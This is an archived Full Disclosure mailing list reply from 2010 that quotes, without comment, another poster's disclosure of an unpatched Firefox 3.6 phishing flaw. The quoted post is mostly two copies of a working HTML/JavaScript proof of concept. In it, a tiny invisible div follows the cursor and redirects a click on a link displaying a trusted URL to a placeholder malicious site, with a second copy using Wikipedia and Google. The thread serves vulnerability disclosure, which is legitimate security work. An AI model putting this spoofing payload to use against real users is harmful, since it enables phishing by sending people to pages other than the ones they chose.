Full Disclosure mailing list archives
Re: Mozilla firefox 3.6 unpatched phishing vulnerability
From: Pradip Sharma <sharma.pradip () gmail com>
Date: Thu, 25 Feb 2010 20:26:51 +0530
On Thu, Feb 25, 2010 at 3:59 AM, <bugsbanned () hushmail com> wrote:
...Unpatched bug since Mozilla firefox 3.0... Mozilla "INsecurity team" remember, security through obscurity just DOESN'T WORK... Locking down bugzilla advisories even the 2 years old ones is unnecessary and lame. <html> <body> <div id="mydiv" onmouseover="document.location='http://Maliciouswebsite';" style="position:absolute;width:2px;height:2px;background:#FFFFFF;bor der:0px"></div> <script> function updatebox(evt) { mouseX=evt.pageX?evt.pageX:evt.clientX; mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById('mydiv').style.left=mouseX-1; document.getElementById('mydiv').style.top=mouseY-1; } </script> <br> <a href="http://trustedwebsite" onclick="updatebox(event)"><font style="font-family:arial;font-size:32px">http://trusted website</font></a><br> </div> </body> </html> For example: <html> <body> <div id="mydiv" onmouseover="document.location='http://www.wikipedia.org';" style="position:absolute;width:2px;height:2px;background:#FFFFFF;bor der:0px"></div> <script> function updatebox(evt) { mouseX=evt.pageX?evt.pageX:evt.clientX; mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById('mydiv').style.left=mouseX-1; document.getElementById('mydiv').style.top=mouseY-1; } </script> <br> <a href="http://www.google.com" onclick="updatebox(event)"><font style="font-family:arial;font- size:32px">http://www.google.com</font></a><br> </div> </body> </html> Source:www exploit-db com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Mozilla firefox 3.6 unpatched phishing vulnerability bugsbanned (Feb 25)
- Re: Mozilla firefox 3.6 unpatched phishing vulnerability Pradip Sharma (Feb 25)
- Re: Mozilla firefox 3.6 unpatched phishing vulnerability Daniel Veditz (Feb 26)